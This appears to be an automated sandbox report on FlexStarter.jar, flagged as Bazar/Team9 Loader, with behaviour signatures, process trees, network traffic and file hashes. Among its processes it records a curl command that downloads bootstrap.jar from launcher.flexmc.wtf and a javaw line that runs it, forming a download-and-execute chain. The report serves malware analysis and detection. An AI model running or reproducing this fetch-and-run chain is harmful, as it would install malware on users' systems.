Analysis Overview
SHA256
97bf913d6017cb86c893aea40352a8494e3f91fd49c71bad4238d0d8a494bb4e
Threat Level: Known bad
The file FlexStarter.jar was found to be: Known bad.
Malicious Activity Summary
Bazar Loader
Bazar/Team9 Loader payload
Modifies file permissions
Drops file in Program Files directory
Checks SCSI registry key(s)
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-04-23 09:08
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-23 09:08
Reported
2024-04-23 09:16
Platform
win7-20240221-en
Max time kernel
357s
Max time network
361s
Command Line
Signatures
Processes
C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\FlexStarter.jar
Network
Files
memory/1624-9-0x00000000020E0000-0x00000000050E0000-memory.dmp
memory/1624-11-0x0000000000220000-0x0000000000221000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-23 09:08
Reported
2024-04-23 09:15
Platform
win10v2004-20240412-en
Max time kernel
415s
Max time network
416s
Command Line
Signatures
Bazar Loader
Bazar/Team9 Loader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\symbols\dll\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\dll\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\dll\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\dll\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\dll\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\symbols\dll\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\ntdll.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jvm.pdb | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\symbols\dll\jvm.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\symbols\dll\ntdll.pdb | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133583369382177748" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe | N/A |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\FlexStarter.jar
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb0581ab58,0x7ffb0581ab68,0x7ffb0581ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb0581ab58,0x7ffb0581ab68,0x7ffb0581ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2200 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1936,i,16685398875077309238,11063309328838788079,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1936,i,16685398875077309238,11063309328838788079,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4328 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4180 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4564 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5080 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4512 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4168 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4952 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4996 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4324 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5468 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2536 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3992 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5956 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\start_flex.bat" "
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar" "https://launcher.flexmc.wtf/bootstrap/bootstrap.jar"
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe
javaw -jar "C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4368 --field-trial-handle=1904,i,15416048844855485939,17259740325705418543,131072 /prefetch:2
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\.flex\hs_err_pid3796.log
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\.flex\bootstrap.jar"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.213.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| GB | 216.58.213.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 4.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.180.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 216.58.212.206:443 | clients2.google.com | udp |
| GB | 216.58.212.206:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 206.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| NL | 23.62.61.56:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 56.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.33.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | flexmc.com.tr | udp |
| US | 172.67.204.160:443 | flexmc.com.tr | tcp |
| US | 172.67.204.160:443 | flexmc.com.tr | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 172.67.204.160:443 | flexmc.com.tr | udp |
| US | 8.8.8.8:53 | 160.204.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 104.17.3.184:443 | challenges.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.17.3.184:443 | challenges.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.3.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.173.246.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | use.fontawesome.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 104.21.27.152:443 | use.fontawesome.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.27.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.termsfeed.com | udp |
| US | 104.26.7.160:443 | www.termsfeed.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | mcapi.us | udp |
| US | 8.8.8.8:53 | minotar.net | udp |
| US | 104.21.80.187:443 | mcapi.us | tcp |
| US | 104.21.234.10:443 | minotar.net | tcp |
| US | 104.21.234.10:443 | minotar.net | tcp |
| US | 104.21.234.10:443 | minotar.net | tcp |
| US | 104.21.234.10:443 | minotar.net | tcp |
| US | 104.21.234.10:443 | minotar.net | tcp |
| US | 8.8.8.8:53 | 160.7.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.80.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.234.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.139.73.23.in-addr.arpa | udp |
| US | 104.26.7.160:443 | www.termsfeed.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | launcher.flexmc.wtf | udp |
| US | 104.21.46.74:443 | launcher.flexmc.wtf | tcp |
| US | 104.21.46.74:443 | launcher.flexmc.wtf | tcp |
| US | 104.21.46.74:443 | launcher.flexmc.wtf | udp |
| US | 8.8.8.8:53 | 74.46.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | launcher.flexmc.wtf | udp |
| US | 172.67.136.102:443 | launcher.flexmc.wtf | tcp |
| US | 8.8.8.8:53 | 102.136.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 163.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| NL | 23.62.61.96:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 96.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.66.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 172.67.136.102:443 | launcher.flexmc.wtf | tcp |
| US | 8.8.8.8:53 | 74.239.69.13.in-addr.arpa | udp |
Files
memory/4500-4-0x000002464DCB0000-0x000002464ECB0000-memory.dmp
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
| MD5 | 36c6890fd1b1c483fe51b2fa9a8c3f73 |
| SHA1 | ca1bbffc05a1f1d0374570c7a2cf6274b9bff1b2 |
| SHA256 | 0ce447f2c59ac62e70d397b11d9a9dd57f8ae58855ab017cac4a0dc79994b08d |
| SHA512 | cc36b02e35ec4b47e6b01fc3ed658323293716f089f070582c535bf001e8f68a4bbeb637a3bf0f0c28cc557e99cf6319ef4d2c0ae68779a2df1370d259885363 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 5b232f2ec5e33f7709f554291a0582c7 |
| SHA1 | 8e09d16cdefd7434b6626535778c4d6aaa94502a |
| SHA256 | 539b48bb8997ee07f386d39e50b64b6a7f14ae24e0fd7c49a5d72e387860d5b5 |
| SHA512 | 570f3bde7f527c8af2cefc04c0bb7d9024c2836b328a25dd50546cffc192d8256a276c6e8e07c0ca5afe06af86b819569f25ac6213e006588fc7edcc95e24d81 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
| MD5 | f732dbed9289177d15e236d0f8f2ddd3 |
| SHA1 | 53f822af51b014bc3d4b575865d9c3ef0e4debde |
| SHA256 | 2741df9ee9e9d9883397078f94480e9bc1d9c76996eec5cfe4e77929337cbe93 |
